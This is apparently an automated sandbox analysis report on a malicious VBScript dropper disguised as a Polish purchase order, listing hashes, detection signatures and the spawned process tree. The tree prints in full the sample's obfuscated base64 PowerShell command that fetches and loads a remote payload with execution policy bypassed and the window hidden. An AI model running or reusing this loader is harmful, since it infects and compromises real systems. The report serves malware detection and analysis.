Edit tour
Windows
Analysis Report
Nowe zam#U00f3wienie Roltop.vbs
Overview
General Information
Sample name: | Nowe zam#U00f3wienie Roltop.vbsrenamed because original name is a hash value |
Original sample name: | Nowe zamwienie Roltop.vbs |
Analysis ID: | 1522478 |
MD5: | 4f593177d0dc7f47a74a20f8d75dacfc |
SHA1: | ec4b127fabf32ce159ae4a093ea30e6f3a85d085 |
SHA256: | c2110d453b7db8bcde1826f213136da46caec8dba656ccad721ad7cb066197f8 |
Tags: | vbsuser-adam_zbadam |
Infos: | |
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 7440 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Nowe zam#U00f3w ienie Rolt op.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 7492 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCgnSFpUJy sndXJsID0g dHBhaCcrJ3 R0cCcrJ3M6 JysnLy9yYX cuZycrJ2l0 aHVidScrJ3 MnKydlcmNv JysnbnQnKy dlbnQuJysn Y29tJysnL0 5vRCcrJ2V0 ZWN0JysnTy crJ24vTm8n KydEZScrJ3 RlY3RPbi9y ZWZzL2hlYW RzL21haW4v RGV0YWhOb3 RoLScrJ1Yu dHh0dHAnKy dhJysnOyBI JysnWicrJ1 RiYScrJ3Nl JysnNicrJz RDb24nKyd0 ZW50ID0nKy cgKE5ldy1P YicrJ2plY3 QgJysnU3lz dGUnKydtJy snLk5ldC4n KydXZScrJ2 JDbGllbnQn KycpLkRvd2 5sb2FkU3Ry aW5nJysnKC crJ0haVHVy JysnbCk7IE haVGJpbmFy eUMnKydvbn RlbnQnKycg JysnPSAnKy dbU3lzdGVt LicrJ0Nvbn YnKydlJysn cnQnKyddOi crJzpGcm9t JysnQicrJ2 FzZTY0U3Qn KydyaW4nKy dnKEgnKyda VGJhc2U2Jy snNENvbicr J3RlbnQnKy cpOyAnKydI WlRhc3NlbW JseSA9ICcr J1snKydSZS crJ2YnKyds ZWN0JysnaW 9uLicrJ0Fz Jysnc2UnKy dtYicrJ2x5 XScrJzo6TG 9hZChIWlRi JysnaW5hcn lDb24nKyd0 ZScrJ24nKy d0KTsgW2Ru bGliLklPLk hvbWVdOjpW QUkoJysnNG RNMC9FJysn VDNQJysnTS 9kL2VlLmV0 JysncycrJ2 FwLy8nKyc6 cycrJ3B0dG g0JysnZE0s JysnIDRkTS crJ2Rlc2F0 JysnaScrJ3 ZhJysnZG80 ZE0sIDRkTW RlcycrJ2F0 aXZhJysnZG 80JysnZE0n KycsJysnID RkTWRlc2F0 aXYnKydhJy snZG80Jysn ZE0nKycsID RkTUFkZEkn KyduJysnUC crJ3JvY2Un KydzczMyNG Rofficiosi dadeCcrJyA nKyc0ZE0nK yc0JysnZE0 nKycsNGRNJ ysnNGQnKyd NKScpIC1yR VBMYUNlICd IWlQnLFtDS GFSXTM2ICA tckVQTGFDZ SAnNGRNJyx bQ0hhUl0zN CAtY3JFUEx hQ2UgJ3RwY ScsW0NIYVJ dMzkpfCAuI CggJHBzSG9 NRVsyMV0rJ HBzaE9NRVs zNF0rJ1gnK Q==';$OWju xd = [syst em.Text.en coding]::U TF8.GetStr ing([syste m.Convert] ::Frombase 64String($ codigo));p owershell. exe -windo wstyle hid den -execu tionpolicy bypass -N oProfile - command $O WjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7500 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7636 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |